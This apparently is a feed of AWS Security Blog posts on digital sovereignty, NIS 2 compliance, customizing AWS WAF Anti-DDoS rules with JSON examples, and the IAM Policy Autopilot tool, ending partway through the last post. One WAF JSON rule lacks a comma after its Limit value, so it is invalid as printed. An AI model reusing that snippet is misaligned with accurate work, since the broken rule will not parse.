AWS understands that every customer has unique digital sovereignty needs, and we remain committed to offering customers the most advanced set of sovereignty controls and security features available in the cloud. Dedicated Local Zones are designed to be customizable, resilient, and scalable across different regulatory environments, so that customers can drive ongoing innovation while meeting their specific requirements.

Ready to explore how Dedicated Local Zones can support your organization’s digital sovereignty journey? Visit AWS Dedicated Local Zones to learn more.

TAGS: AWS Digital Sovereignty Pledge, Digital Sovereignty, Security Blog, Sovereign-by-design, Public Sector, Singapore, AWS Dedicated Local Zones

Max Peterson
Max is the Vice President of AWS Sovereign Cloud. He leads efforts to help public sector organizations modernize their missions with the cloud while meeting necessary digital sovereignty requirements. Max previously oversaw broader digital sovereignty efforts at AWS and served as the VP of AWS Worldwide Public Sector with a focus on empowering government, education, healthcare, and nonprofit organizations to drive rapid innovation.
Stéphane Israël
Stéphane is the Managing Director of the AWS European Sovereign Cloud and Digital Sovereignty. He is responsible for the management and operations of the AWS European Sovereign Cloud GmbH, including infrastructure, technology, and services, and leads broader worldwide digital sovereignty efforts at AWS. Prior to AWS, he was the CEO of Arianespace, where he oversaw numerous successful space missions, including the launch of the James Webb Space Telescope.

Exploring the new AWS European Sovereign Cloud: Sovereign Reference Framework

11 December 2025 at 22:59

At Amazon Web Services, we’re committed to deeply understanding the evolving needs of both our customers and regulators, and rapidly adapting and innovating to meet them. The upcoming AWS European Sovereign Cloud will be a new independent cloud for Europe, designed to give public sector organizations and customers in highly regulated industries further choice to meet their unique sovereignty requirements. The AWS European Sovereign Cloud expands on the same strong foundation of security, privacy, and compliance controls that apply to other AWS Regions around the globe with additional governance, technical, and operational measures to address stringent European customer and regulatory expectations. Sovereignty is the defining feature of the AWS European Sovereign Cloud and we’re using an independently validated framework to meet our customers’ requirements for sovereignty, while delivering the scalability and functionality you expect from the AWS Cloud.

Today, we’re pleased to share further details about the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). This reference framework aligns sovereignty criteria across multiple domains, such as governance independence, operational control, data residency, and technical isolation. Working backwards from our customers’ sovereign use cases, we aligned controls to each of the criteria, and the AWS European Sovereign Cloud is undergoing an independent third-party audit to verify that the design and operations of these controls conform to AWS sovereignty commitments. Customers and partners can also leverage the ESC-SRF as a foundation upon which they can build their own complementary sovereignty criteria and controls when using the AWS European Sovereign Cloud.

To clearly explain how the AWS European Sovereign Cloud meets sovereignty expectations, we’re publishing the ESC-SRF in AWS Artifact including the criteria and control mapping. In AWS Artifact, our self-service audit artifact retrieval portal, you have on-demand access to AWS security and compliance documents and AWS agreements. You can now use the ESC-SRF to define best practices for your own use case, map these to controls, and illustrate how you meet and even exceed sovereign needs of your customers.

A transparent and validated sovereignty model

The ESC-SRF has been built from customer feedback, regulatory requirements across the European Union (EU), industry frameworks, AWS contractual commitments, and partner input. ESC-SRF is industry and sector agnostic, as it’s written to address fundamental sovereignty needs and expectations at the foundational layer of our cloud offerings with additional sovereignty-specific requirements and controls that apply exclusively to the AWS European Sovereign Cloud. Each criterion is implemented through sovereign controls that will be independently validated by a third-party auditor.

The framework builds on core AWS security capabilities, including encryption, key management, access governance, AWS Nitro System-based isolation, and internationally recognized compliance certifications. The framework adds sovereign-specific governance, technical, and operational measures such as independent EU corporate structures, dedicated EU trust and certificate services, operations by AWS EU-resident personnel, strict residency for customer data and customer created metadata, separation from all other AWS Regions, and incident response operated within the EU.

These controls are the basis of a dedicated AWS European Sovereign Cloud System and Organization Controls (SOC) 2 attestation. The ESC-SRF establishes a solid foundation for sovereignty of the cloud, so that customers can focus on defining sovereignty measures in the cloud that are tailored to their goals, regulatory needs, and risk posture.

How you can use the ESC-SRF

The ESC-SRF describes how AWS implements and validates sovereignty controls in the AWS European Sovereign Cloud. AWS treats each criterion as binding and its implementation will be validated by an independent third-party auditor in 2026. While most customers don’t operate at the size and scale of AWS, you can use the ESC-SRF as both an assurance model and a reference framework you can adapt to your specific use cases.

From an assurance perspective, it provides end-to-end visibility for each sovereignty criterion through to its technical implementation. We will also provide third-party validation in the AWS European Sovereign Cloud SOC 2 report. Customers can use this report with internal auditors, external assessors, supervisory authorities, and regulators. This can reduce the need for ad hoc evidence requests and gives customers evidence to demonstrate clear and enforceable sovereignty assurances.

From a design perspective, you can refer to the framework when shaping your own sovereignty architecture, selecting configurations, and defining internal controls to meet regulatory, contractual, and mission-specific requirements. Because the ESC-SRF is industry and sector agnostic, you can apply criteria from the framework to suit your own unique needs; depending on your sovereign use case, not all criteria may apply. The ESC-SRF can also be used in conjunction with AWS Well-Architected, which can help you learn, measure, and build using architectural best practices. Where appropriate, you can create your own version of the ESC-SRF, map it to controls, and have them tested by a third party. To download the ESC-SRF, visit AWS Artifact (login required).

A strong, clear foundation

The publication of the ESC-SRF is part of our ongoing commitment to delivering on the AWS Digital Sovereignty Pledge through transparency and assurances that are designed, implemented, and validated entirely within the EU, helping customers meet their evolving sovereignty needs. With the framework, customers can build solutions in the AWS European Sovereign Cloud with confidence and a clear understanding of how they can meet their sovereignty goals using AWS.

For more information about the AWS European Sovereign Cloud, visit aws.eu.


If you have feedback about this post, submit comments in the Comments section below.

Andreas Terwellen

Andreas Terwellen

Andreas is a Senior Manager in security audit assurance at AWS, based in Frankfurt, Germany. His team is responsible for third-party and customer audits, attestations, certifications, and assessments across Europe. Previously, he was a CISO in a DAX-listed telecommunications company in Germany. He also worked for various consulting companies managing large teams and programs across multiple industries and sectors.

Embracing our broad responsibility for securing digital infrastructure in the European Union

11 December 2025 at 01:53

This post was first published on August 31, 2023.


Over the past few decades, digital technologies have brought tremendous benefits to our societies, governments, businesses, and everyday lives. The increasing reliance on digital technologies comes with a broad responsibility for society, companies, and governments to ensure that security remains robust and uncompromising, regardless of the use case.

At Amazon Web Services (AWS), every employee is responsible for ensuring that security is an integral component of every facet of the business. This commitment positions AWS well as the cybersecurity regulatory landscape continues to evolve and mature across Europe.

The Directive on Measures for a High Common Level of Cybersecurity Across the Union (NIS 2), formally adopted by the European Parliament and the Council of the European Union (EU) as Directive (EU) 2022/2555 and applicable across the EU since October 2024, is a prime example of this evolution. As of December 2025, most EU Member States have transposed NIS 2 into national law, though national implementation timelines and requirements vary, and full enforcement extends into 2026 in several jurisdictions as the transition to the new regime continues. Throughout, the Directive aims to strengthen cybersecurity across the EU.

AWS is excited to help customers become more resilient, and we look forward to even closer cooperation with national cybersecurity authorities to raise the bar on cybersecurity across Europe. Building society’s trust in the online environment is key to harnessing the power of innovation for social and economic development. It’s also one of our core Leadership Principles: Success and scale bring broad responsibility.

Compliance with NIS 2

NIS 2 seeks to ensure that entities mitigate the risks posed by cyber threats, minimize the impact of incidents, and protect the continuity of essential and important services in the EU.

NIS 2 establishes a strengthened EU-wide framework for cybersecurity, imposing risk-based and proportionate obligations on essential and important entities across critical sectors. It mandates a set of measures (including governance, incident management, business continuity, supply chain security, access controls, and cryptography) to ensure effective protection of network and information systems, tailored to each entity's specific risk profile, size, and sector. These measures must cover the full cybersecurity lifecycle (identification, protection, detection, response, recovery, and communication), with requirements for regular testing, supply chain risk management, and reporting significant incidents to national authorities.

In several countries, aspects of AWS offerings are already part of the national critical infrastructure. For example, in Germany, Amazon Elastic Compute Cloud (Amazon EC2) and Amazon CloudFront are in scope for the KRITIS regulation. For several years, AWS has fulfilled its obligations to secure these services, run audits related to national critical infrastructure, and established channels for exchanging security information with the German Federal Office for Information Security (BSI) KRITIS office. AWS is also part of the UP KRITIS initiative, a cooperative effort between industry and the German Government to set industry standards.

AWS will continue to support customers in implementing resilient solutions, in accordance with the AWS Shared Responsibility Model. AWS supports customers in aligning with the NIS 2 Directive (EU) 2022/2555 and its Implementing Regulation (EU) 2024/2690 through services, global infrastructure, and independently audited compliance programs that enable essential and important entities to address a wide range of NIS 2 obligations, from governance, risk management, and incident reporting to business continuity, supply chain security, and cryptographic controls.

AWS cybersecurity risk management – Current status

AWS has been helping customers enhance their resilience and incident response capabilities long before NIS 2 was introduced. Our core infrastructure is designed to satisfy the security requirements of the military, global banks, and other highly sensitive organizations.

AWS provides information and communication technology services and building blocks that businesses, public authorities, universities, and individuals can use to become more secure, innovative, and responsive to their own needs and the needs of their customers. Security and compliance remain a shared responsibility between AWS and the customer. We make sure that the AWS cloud infrastructure complies with applicable regulatory requirements and good practices for cloud providers, and customers remain responsible for building compliant workloads in the cloud.

AWS offers over 150 independently audited security standards compliance certifications and attestations worldwide, such as ISO 27001, ISO 22301, ISO 20000, ISO 27017, and System and Organization Controls (SOC) 2. The following are some examples of European certifications and attestations that we've achieved:

  • C5 – provides a wide-ranging control framework for establishing and evidencing the security of cloud operations in Germany.
  • ENS High – comprises principles for adequate protection applicable to government agencies and public organizations in Spain. The CCN has aligned ENS (through its PCE-NIS2 profile in CCN-STIC Guide 892) as a certifiable route to NIS 2 compliance in Spain, with advisory support through ENISA’s mappings and European Commission (EC) transposition guidelines.
  • HDS – demonstrates an adequate framework for technical and governance measures to secure and protect personal health data, governed by French law.
  • Pinakes – provides a rating framework intended to manage and monitor the cybersecurity controls of service providers upon which Spanish financial entities depend.

These and other AWS Compliance Programs help customers understand the robust controls in place at AWS to help ensure the security and compliance of the cloud. Through dedicated teams, we’re prepared to provide assurance about the approach that AWS has taken to operational resilience and to help customers achieve assurance about the security and resiliency of their workloads. AWS Artifact provides on-demand access to these security and compliance reports and many more.

For security in the cloud, it’s crucial for our customers to make security by design and security by default central tenets of product development. Customers can use the AWS Well-Architected Framework to help build secure, high-performing, resilient, and efficient infrastructure for a variety of applications and workloads.

Customers that use the AWS Cloud Adoption Framework (AWS CAF) can improve cloud readiness by identifying and prioritizing transformation opportunities. These foundational resources help customers secure regulated workloads. AWS Security Hub provides customers with a comprehensive view of their security state on AWS and helps them check their environments against industry standards and good practices.

With regard to the cybersecurity risk management measures and reporting obligations that NIS 2 mandates, existing AWS service offerings can help customers fulfill their part of the shared responsibility model and comply with current national implementations of NIS 2. AWS CloudTrail provides centralized audit logging, while Amazon CloudWatch offers metrics, alarms, and application log analysis. With AWS Config, customers can continually assess, audit, and evaluate the configurations and relationships of selected resources on AWS, on premises, and on other clouds. Furthermore, AWS Whitepapers, such as the AWS Security Incident Response Guide, help customers understand, implement, and manage fundamental security concepts in their cloud architecture.

The updated NIS 2 Considerations for AWS Customers guide (December 2025) features a mapping table that links the Annex requirements to specific AWS capabilities, empowering entities to interpret obligations and deploy proportionate controls efficiently. Customers can use services such as Security Hub for centralized security alerts, AWS Config for resource inventory, AWS Audit Manager for automated evidence collection, Amazon Inspector for vulnerability management, and AWS Resilience Hub for resilience assessments.

NIS 2 foresees the development and implementation of comprehensive cybersecurity awareness training programs for management bodies and employees. At AWS, we provide various training programs at no cost to increase cybersecurity awareness, such as the AWS Security Learning Hub, which includes phishing simulations, cloud security fundamentals, and role-based modules. Customers can deliver organization-wide training using AWS Skill Builder modules on phishing, cyber hygiene, and secure cloud practices, assign role-specific paths, and track completion across accounts using AWS Organizations.

AWS cooperation with authorities

At Amazon, we strive to be the world’s most customer-centric company. For AWS Security Assurance, that means having teams that continuously engage with authorities to understand and exceed regulatory and customer obligations on behalf of customers. This is one way that we raise the security bar in Europe. At the same time, we recommend that national regulators carefully assess potentially conflicting, overlapping, or contradictory measures.

We also cooperate with cybersecurity agencies around the globe because we recognize the importance of their role in keeping the world safe. To that end, we have built the AWS Global Cloud Security Program (GCSP) to provide agencies with a direct and consistent line of communication to the AWS Security team. Two examples of GCSP members are the Dutch National Cyber Security Centrum (NCSC-NL), with whom we signed a cooperation agreement in May 2023, and the Italian National Cybersecurity Agency (ACN).

In Spain, AWS signed a strategic collaboration agreement (MoU) with the National Intelligence Center and National Cryptologic Center (CNI-CCN) in August 2023 to promote cybersecurity and innovation in the public sector through AWS Cloud technology. As a result, the CCN joined the GCSP, and the partnership has produced eight STIC guides (Series 887) on topics including hardening, incident response, and monitoring for multi-cloud and hybrid environments. The partnership also produced the ENS Landing Zone template (CCN-STIC-887 Anexo A), which customers can download from the CCN website to deploy ENS-compliant cloud environments. In addition to ENS High accreditation, more than 25 AWS cloud services have been accredited by the CCN under the Security Catalog of Products and Services (CPSTIC) for processing sensitive and classified workloads in Spain.

Together, we will continue to work on cybersecurity initiatives and strengthen the cybersecurity posture across the EU. With the war in Ukraine, we have experienced how important such a collaboration can be. AWS has played an important role in helping Ukraine’s government maintain continuity and provide critical services to citizens since the onset of the war.

The way forward

At AWS, we will continue to provide key stakeholders with greater insights into how we help customers tackle their most challenging cybersecurity issues and provide opportunities to deep dive into what we're building. We look forward to continuing our work with authorities, agencies, and, most importantly, our customers to provide the best solutions and raise the bar on cybersecurity and resilience across the EU and globally.

The updated NIS 2 Considerations for AWS Customers guide (December 2025) and the AWS Compliance Center serve as central hubs for the latest resources, including mappings to ENISA Technical Implementation Guidance (26 June 2025), whitepapers, and audit-ready documentation. Entities can begin with AWS Control Tower or Landing Zone Accelerator to establish secure baselines, then apply the Well-Architected Framework (Security and Reliability Pillars) to design auditable, resilient architectures. For organizations seeking external expertise, AWS Marketplace partners offer specialized support in gap analysis, resilience testing, and ENISA mapping implementation.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Ashley Lam

Ashley Lam

Ashley is the Senior Security Assurance Lead for AWS in the UK and Ireland region. With 10 years of extensive program management experience, she excels in regulatory and customer compliance. Drawing from security, compliance, and cloud operations expertise in betting & gaming and telecoms industries, she leads engagements with regulators and stakeholders to drive secure cloud adoption.

Frank Adelmann

Frank Adelmann

Frank is the Regulated Industry and Security Engagement Lead for Regulated Commercial Sectors in Europe. He joined AWS in 2022 after working as a regulator in the European financial sector, technical advisor on cybersecurity matters in the International Monetary Fund, and Head of Information Security in the European Commodity Clearing AG. Today, Frank is passionately engaging with European regulators to understand and exceed regulatory and customer expectations.

How to customize your response to layer 7 DDoS attacks using AWS WAF Anti-DDoS AMR

10 December 2025 at 05:41

Over the first half of this year, AWS WAF introduced new application-layer protections to address the growing trend of short-lived, high-throughput Layer 7 (L7) distributed denial of service (DDoS) attacks. These protections are provided through the AWS WAF Anti-DDoS AWS Managed Rules (Anti-DDoS AMR) rule group. While the default configuration is effective for most workloads, you might want to tailor the response to match your application’s risk tolerance.

In this post, you’ll learn how the Anti-DDoS AMR works, and how you can customize its behavior using labels and additional AWS WAF rules. You’ll walk through three practical scenarios, each demonstrating a different customization technique.

How the Anti-DDoS AMR works at a high level

The Anti-DDoS AMR establishes a baseline of your traffic and uses it to detect anomalies within seconds. As shown in Figure 1, when the Anti-DDoS AMR detects a DDoS attack, it adds the event-detected label to all incoming requests, and the ddos-request label to incoming requests that are suspected of contributing to the attack. It also adds a confidence-based label, such as high-suspicion-ddos-request, to suspected requests. In AWS WAF, a label is metadata that a rule adds to a request when the rule matches it. After being added, a label is available to subsequent rules, which can use it to enrich their evaluation logic. The Anti-DDoS AMR uses the added labels to mitigate the DDoS attack.

Figure 1 – Anti-DDOS AMR process flow


Default mitigations are based on a combination of Block and JavaScript Challenge actions. The Challenge action can only be handled properly by a client that’s expecting HTML content. For this reason, you need to exclude the paths of non-challengeable requests (such as API fetches) in the Anti-DDoS AMR configuration. The Anti-DDoS AMR applies the challengeable-request label to requests that don’t match the configured challenge exclusions. By default, the following mitigation rules are evaluated in order:

  • ChallengeAllDuringEvent, which is equivalent to the following logic: IF event-detected AND challengeable-request THEN challenge.
  • ChallengeDDoSRequests, which is equivalent to the following logic: IF (high-suspicion-ddos-request OR medium-suspicion-ddos-request OR low-suspicion-ddos-request) AND challengeable-request THEN challenge. Its sensitivity can be changed to match your needs, such as challenging only medium- and high-suspicion DDoS requests.
  • DDoSRequests, which is equivalent to the following logic: IF high-suspicion-ddos-request THEN block. Its sensitivity can be changed to match your needs, such as blocking medium-suspicion in addition to high-suspicion DDoS requests.
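As a mental model, the three default rules can be sketched as plain label logic. The helper below is illustrative only (it uses the short label names from above and is not how the managed rule group is implemented):

```python
def default_mitigation(labels: set) -> str:
    """Illustrative sketch of the default Anti-DDoS AMR rule order.

    `labels` holds the short label names applied to a request; returns the
    first matching action, mirroring top-to-bottom rule evaluation.
    """
    suspicion = {"high-suspicion-ddos-request",
                 "medium-suspicion-ddos-request",
                 "low-suspicion-ddos-request"}

    # ChallengeAllDuringEvent
    if "event-detected" in labels and "challengeable-request" in labels:
        return "challenge"
    # ChallengeDDoSRequests
    if labels & suspicion and "challengeable-request" in labels:
        return "challenge"
    # DDoSRequests
    if "high-suspicion-ddos-request" in labels:
        return "block"
    return "allow"
```

Note how a non-challengeable request (for example, an API fetch) suspected at high confidence falls through the two challenge rules and is blocked by DDoSRequests.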

Customizing your response to layer 7 DDoS attacks

This customization can be done using two different approaches. In the first approach, you configure the Anti-DDoS AMR to take the action you want, then add subsequent rules to further harden your response under certain conditions. In the second approach, you change some or all of the rules of the Anti-DDoS AMR to count mode, then create additional rules that define your response to DDoS attacks.

In both approaches, the subsequent rules are configured using conditions you define, combined with conditions based on labels applied to requests by the Anti-DDoS AMR. The following section includes three examples of customizing your response to DDoS attacks. The first two examples are based on the first approach, while the last one is based on the second approach.

Example 1: More sensitive mitigation outside of core countries

Let’s suppose that your main business is conducted in two main countries, the UAE and KSA. You are happy with the default behavior of the Anti-DDoS AMR in these countries, but you want to block more aggressively outside of these countries. You can implement this using the following rules:

  • Anti-DDoS AMR with default configurations
  • A custom rule that blocks if the following conditions are met: the request is initiated from outside of the UAE and KSA AND the request has the high-suspicion-ddos-request or medium-suspicion-ddos-request label

Configuration

After adding your Anti-DDoS AMR with default configuration, create a subsequent custom rule with the following JSON definition.

Note: You need to use the AWS WAF JSON rule editor or infrastructure-as-code (IaC) tools (such as AWS CloudFormation or Terraform) to define this rule. The current AWS WAF console doesn’t allow creating rules with multiple AND/OR logic nesting.

{
    "Action": {
        "Block": {}
    },
    "Name": "more-sensitive-ddos-mitigation-outside-of-core-countries",
    "Priority": 1,
    "Statement": {
        "AndStatement": {
            "Statements": [
                {
                    "NotStatement": {
                        "Statement": {
                            "GeoMatchStatement": {
                                "CountryCodes": [
                                    "AE",
                                    "SA"
                                ]
                            }
                        }
                    }
                },
                {
                    "OrStatement": {
                        "Statements": [
                            {
                                "LabelMatchStatement": {
                                    "Key": "awswaf:managed:aws:anti-ddos:medium-suspicion-ddos-request",
                                    "Scope": "LABEL"
                                }
                            },
                            {
                                "LabelMatchStatement": {
                                    "Key": "awswaf:managed:aws:anti-ddos:high-suspicion-ddos-request",
                                    "Scope": "LABEL"
                                }
                            }
                        ]
                    }
                }
            ]
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "more-sensitive-ddos-mitigation-outside-of-core-countries",
        "SampledRequestsEnabled": true
    }
}
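Because the console can't express this nesting, you'll typically keep such rule definitions in version control. As a hedged sketch (this helper is not part of AWS WAF), a small local check can catch common mistakes, such as a label key outside the managed anti-DDoS namespace, before you deploy through IaC:

```python
def check_rule(rule: dict) -> None:
    """Hypothetical pre-deployment sanity check for a WAF rule definition."""
    assert "Action" in rule and "Statement" in rule, "rule needs Action and Statement"
    assert rule["VisibilityConfig"]["MetricName"] == rule["Name"], "metric/name mismatch"

    def walk(node):
        # Verify every referenced label uses the managed anti-DDoS namespace.
        if isinstance(node, dict):
            if "LabelMatchStatement" in node:
                key = node["LabelMatchStatement"]["Key"]
                assert key.startswith("awswaf:managed:aws:anti-ddos:"), key
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(rule["Statement"])
```

For example, load the rule JSON above with json.load() and pass it to check_rule() before running your CloudFormation or Terraform deployment.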

Similarly, during an attack, you can more aggressively mitigate requests from unusual sources, such as requests labeled by the Anonymous IP managed rule group as coming from web hosting and cloud providers.

Example 2: Lower rate-limiting thresholds during DDoS attacks

Suppose that your application has sensitive URLs that are compute heavy. To protect the availability of your application, you have applied a rate-limiting rule to these URLs, configured with a threshold of 100 requests over a 2-minute window. You can harden this response during a DDoS attack by applying a more aggressive threshold. You can implement this using the following rules:

  1. An Anti-DDoS AMR with default configurations
  2. A rate-limiting rule, scoped to sensitive URLs, configured with a threshold of 100 requests over a 2-minute window
  3. A rate-limiting rule, scoped to sensitive URLs and to the event-detected label, configured with a threshold of 10 requests over a 10-minute window

Configuration

After adding your Anti-DDoS AMR with default configuration, and your rate-limit rule for sensitive URLs, create a subsequent new rate limiting rule with the following JSON definition.

{
    "Action": {
        "Block": {}
    },
    "Name": "ip-rate-limit-10-10mins-under-ddos",
    "Priority": 2,
    "Statement": {
        "RateBasedStatement": {
            "AggregateKeyType": "IP",
            "EvaluationWindowSec": 600,
            "Limit": 10,
            "ScopeDownStatement": {
                "AndStatement": {
                    "Statements": [
                        {
                            "ByteMatchStatement": {
                                "FieldToMatch": {
                                    "UriPath": {}
                                },
                                "PositionalConstraint": "EXACTLY",
                                "SearchString": "/sensitive-url",
                                "TextTransformations": [
                                    {
                                        "Priority": 0,
                                        "Type": "LOWERCASE"
                                    }
                                ]
                            }
                        },
                        {
                            "LabelMatchStatement": {
                                "Key": "awswaf:managed:aws:anti-ddos:event-detected",
                                "Scope": "LABEL"
                            }
                        }
                    ]
                }
            }
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "ip-rate-limit-10-10mins-under-ddos",
        "SampledRequestsEnabled": true
    }
}
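To see how the two thresholds interact, the following illustrative helper counts one IP's requests in a trailing window (this is a simplification, not AWS WAF's internal counting):

```python
from bisect import bisect_left

def exceeds_limit(timestamps, now, window_sec, limit):
    """Illustrative sliding-window check: True once the requests seen in the
    trailing window exceed the limit. Timestamps are sorted, in seconds."""
    start = bisect_left(timestamps, now - window_sec)
    return len(timestamps) - start > limit

# One request every 30 seconds from a single IP, sustained for 20 minutes:
reqs = [i * 30.0 for i in range(40)]
steady_state = exceeds_limit(reqs, 1200.0, 120, 100)   # rule 2: 100 per 2 min
during_attack = exceeds_limit(reqs, 1200.0, 600, 10)   # rule 3: 10 per 10 min
```

At this pace the client stays far below the everyday 100-per-2-minute threshold, but once the event-detected label activates the 10-per-10-minute rule, the same client is rate limited.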

Example 3: Adaptive response according to your application scalability

Suppose that you are operating a legacy application that can safely scale up to a certain threshold of traffic volume, after which it degrades. If the total traffic volume, including the DDoS traffic, is below this threshold, you decide not to challenge all requests during a DDoS attack, to avoid impacting user experience. In this scenario, you'd rely only on the default block action for high-suspicion DDoS requests. If the total traffic volume is above the threshold that your legacy application can safely process, you decide to use the equivalent of the Anti-DDoS AMR's default ChallengeDDoSRequests mitigation. You can implement this using the following rules:

  1. An Anti-DDoS AMR with ChallengeAllDuringEvent and ChallengeDDoSRequests rules configured in count mode.
  2. A rate-limiting rule that counts your traffic and is configured with a threshold corresponding to your application's capacity to process traffic normally. As its action, it only counts requests and applies a custom label (for example, CapacityExceeded) when its threshold is met.
  3. A rule that mimics ChallengeDDoSRequests but applies only when the CapacityExceeded label is present: challenge if the ddos-request, CapacityExceeded, and challengeable-request labels are all present
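Taken together, these rules implement the following decision logic, sketched here as an illustrative Python helper (full label keys assumed; mycompany:capacityexceeded is the custom label from rule 2):

```python
PREFIX = "awswaf:managed:aws:anti-ddos:"

def adaptive_action(labels: set) -> str:
    """Illustrative sketch of Example 3's adaptive response (not WAF internals)."""
    # DDoSRequests stays active in the managed rule group: block high suspicion.
    if PREFIX + "high-suspicion-ddos-request" in labels:
        return "block"
    # Custom rule: challenge suspected requests only above the capacity threshold.
    if {"mycompany:capacityexceeded",
        PREFIX + "ddos-request",
        PREFIX + "challengeable-request"} <= labels:
        return "challenge"
    return "allow"
```

Below capacity, only high-suspicion requests are blocked; above capacity, suspected challengeable requests are challenged as well.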

Configuration

First, update your Anti-DDoS AMR by changing Challenge actions to Count actions.

Figure 2 – Updated Anti-DDoS AMR rules in example 3


Then create the rate limit capacity-exceeded-detection rule in count mode, using the following JSON definition:

{
    "Action": {
        "Count": {}
    },
    "Name": "capacity-exceeded-detection",
    "Priority": 2,
    "RuleLabels": [
        {
            "Name": "mycompany:capacityexceeded"
        }
    ],
    "Statement": {
        "RateBasedStatement": {
            "Limit": 10000
            "AggregateKeyType": "CONSTANT",
            "EvaluationWindowSec": 120,
            "ScopeDownStatement": {
                "NotStatement": {
                    "Statement": {
                        "LabelMatchStatement": {
                            "Scope": "LABEL",
                            "Key": "non-exsiting-label-to-count-all-requests"
                        }
                    }
                }
            }
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "capacity-exceeded-detection",
        "SampledRequestsEnabled": true
    }
}

Finally, create the challenge-if-ddos-and-capacity-exceeded challenge rule using the following JSON definition:

{
    "Action": {
        "Challenge": {}
    },
    "Name": "challenge-if-ddos-and-capacity-exceeded",
    "Priority": 3,
    "Statement": {
        "AndStatement": {
            "Statements": [
                {
                    "LabelMatchStatement": {
                        "Key": "mycompany:capacityexceeded",
                        "Scope": "LABEL"
                    }
                },
                {
                    "LabelMatchStatement": {
                        "Key": "awswaf:managed:aws:anti-ddos:ddos-request",
                        "Scope": "LABEL"
                    }
                },
                {
                    "LabelMatchStatement": {
                        "Key": "awswaf:managed:aws:anti-ddos:challengeable-request",
                        "Scope": "LABEL"
                    }
                }
            ]
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "challenge-if-ddos-and-capacity-exceeded",
        "SampledRequestsEnabled": true
    }
}

Conclusion

By combining the built-in protections of the Anti-DDoS AMR with custom logic, you can adapt your defenses to match your unique risk profile, traffic patterns, and application scalability. The examples in this post illustrate how you can fine-tune sensitivity, enforce stronger mitigations under specific conditions, and even build adaptive defenses that respond dynamically to your system’s capacity.

You can use the dynamic labeling system in AWS WAF to implement customization granularly. You can also use AWS WAF labels to exclude costly logging of DDoS attack traffic.

If you have feedback about this post, submit comments in the Comments section below.

Achraf Souk

Achraf is a Principal Solutions Architect at AWS with more than 15 years of experience in cloud, security, and networking. He works closely with customers across industries to design resilient, fast, and secure web applications. A frequent writer and speaker, he enjoys simplifying deeply technical topics for a wider audience. Achraf has a track record in building and scaling technical organizations.

IAM Policy Autopilot: An open-source tool that brings IAM policy expertise to builders and AI coding assistants

9 December 2025 at 00:23

Today, we're excited to announce IAM Policy Autopilot, an open-source static analysis tool that helps your AI coding assistants quickly create baseline AWS Identity and Access Management (IAM) policies that you can review and refine as your application evolves. IAM Policy Autopilot is available as a command-line tool and Model Context Protocol (MCP) server, and it analyzes application code locally to create identity-based policies that control access for application roles. By adopting IAM Policy Autopilot, builders can focus on writing application code, accelerating development on Amazon Web Services (AWS) and saving time otherwise spent writing IAM policies and troubleshooting access issues.

Builders developing on AWS want to accelerate development and deliver value faster to their businesses, and they are increasingly using AI coding assistants like Kiro, Claude Code, Cursor, and Cline to do so. There are three aspects of IAM permissions where builders could use some help. First, builders might want to focus on developing applications instead of spending time understanding permissions, writing IAM policies, or troubleshooting permission-related errors. Second, AI coding assistants, while excelling at generating application code, struggle with the nuances of IAM and need tools to help them produce reliable policies that capture complex cross-service permission requirements. Third, both builders and their AI assistants need to stay current with the latest IAM requirements and integration approaches without going through AWS documentation manually, ideally through a single tool that stays up to date with IAM expertise.

IAM Policy Autopilot addresses these challenges in three ways. First, it performs deterministic code analysis of your application, generating the necessary identity-based IAM policies based on actual AWS SDK calls in your codebase. This speeds up the initial policy creation process and reduces troubleshooting time. Second, IAM Policy Autopilot provides AI coding assistants with accurate, reliable IAM configurations through the MCP, preventing AI hallucinations that often lead to policy errors and verifying that generated policies are syntactically correct and valid. Third, IAM Policy Autopilot stays current with the expanding AWS service catalog by regularly updating its expertise with new services, permissions, and integration patterns, so both builders and their AI assistants have access to current IAM requirements without manual research.

This post demonstrates IAM Policy Autopilot in action, showing how it analyzes your code to generate IAM identity-based policies during development. You’ll see how IAM Policy Autopilot seamlessly integrates with AI coding assistants to create the necessary baseline policies during deployment, and how builders can also use IAM Policy Autopilot directly through its command line interface (CLI) tool. We’ll also provide guidance on best practices and considerations for incorporating IAM Policy Autopilot into your development workflow. You can set up IAM Policy Autopilot by visiting the GitHub repository.

How IAM Policy Autopilot works

IAM Policy Autopilot analyzes application code and generates identity-based IAM policies based on the AWS SDK calls in your application. During testing, if permissions are still missing, IAM Policy Autopilot detects these errors and adds the necessary policies to get you unblocked. IAM Policy Autopilot supports applications written in three languages: Python, Go, and TypeScript.

Policy creation

The core capability of IAM Policy Autopilot is deterministic code analysis that generates IAM identity-based policies with consistent, reliable results. Beyond simple SDK-to-IAM mappings, IAM Policy Autopilot understands complex dependency relationships across AWS services. For a call to s3.putObject(), IAM Policy Autopilot generates not only the Amazon Simple Storage Service (Amazon S3) permission (s3:PutObject) but also the AWS Key Management Service (AWS KMS) permission (kms:GenerateDataKey) that might be required for encryption scenarios. IAM Policy Autopilot understands cross-service dependencies and common usage patterns and intentionally includes these PutObject-related permissions in the initial pass, so that your application can function correctly from the first deployment regardless of encryption configuration.
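The dependency expansion described above can be pictured as a lookup from SDK call to primary IAM action plus companion actions. The following Python sketch is purely illustrative — the mapping table and function names are hypothetical, not IAM Policy Autopilot's actual data or API:

```python
# Illustrative sketch of SDK-call-to-IAM-action expansion.
# The mapping below is hypothetical, not IAM Policy Autopilot's real data.

# Each SDK call maps to its primary IAM action plus companion actions
# that common configurations (such as SSE-KMS encryption) may require.
SDK_ACTION_MAP = {
    "s3.put_object": {
        "primary": "s3:PutObject",
        "companions": ["kms:GenerateDataKey"],  # needed when the bucket uses SSE-KMS
    },
    "s3.get_object": {
        "primary": "s3:GetObject",
        "companions": ["kms:Decrypt"],  # needed to read SSE-KMS-encrypted objects
    },
}

def expand_actions(sdk_calls):
    """Return the deduplicated, sorted IAM actions for a list of SDK calls."""
    actions = set()
    for call in sdk_calls:
        entry = SDK_ACTION_MAP[call]
        actions.add(entry["primary"])
        actions.update(entry["companions"])
    return sorted(actions)

print(expand_actions(["s3.put_object"]))
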